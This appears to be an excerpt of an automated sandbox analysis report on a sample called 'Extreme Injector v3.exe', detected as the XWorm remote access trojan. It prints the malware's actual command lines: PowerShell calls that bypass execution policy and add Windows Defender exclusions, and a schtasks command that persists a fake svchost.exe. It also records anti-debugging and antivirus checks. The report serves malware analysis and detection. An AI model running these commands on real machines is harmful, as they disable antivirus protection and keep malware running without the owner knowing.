                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                      Source: svchost.exe.0.drBinary or memory string: vmware
                      Source: Extreme Injector v3.exe, 00000000.00000002.2929290109.000000001B370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeCode function: 0_2_00007FFD9B8979E1 CheckRemoteDebuggerPresent,0_2_00007FFD9B8979E1
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Extreme Injector v3.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002603000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002603000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002603000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002603000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2y
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002603000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeQueries volume information: C:\Users\user\Desktop\Extreme Injector v3.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Extreme Injector v3.exe, 00000000.00000002.2917443037.0000000000924000.00000004.00000020.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2917443037.000000000097D000.00000004.00000020.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2929290109.000000001B437000.00000004.00000020.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2929290109.000000001B40A000.00000004.00000020.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2929290109.000000001B370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: Extreme Injector v3.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Extreme Injector v3.exe PID: 7412, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: Extreme Injector v3.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Extreme Injector v3.exe PID: 7412, type: MEMORYSTR
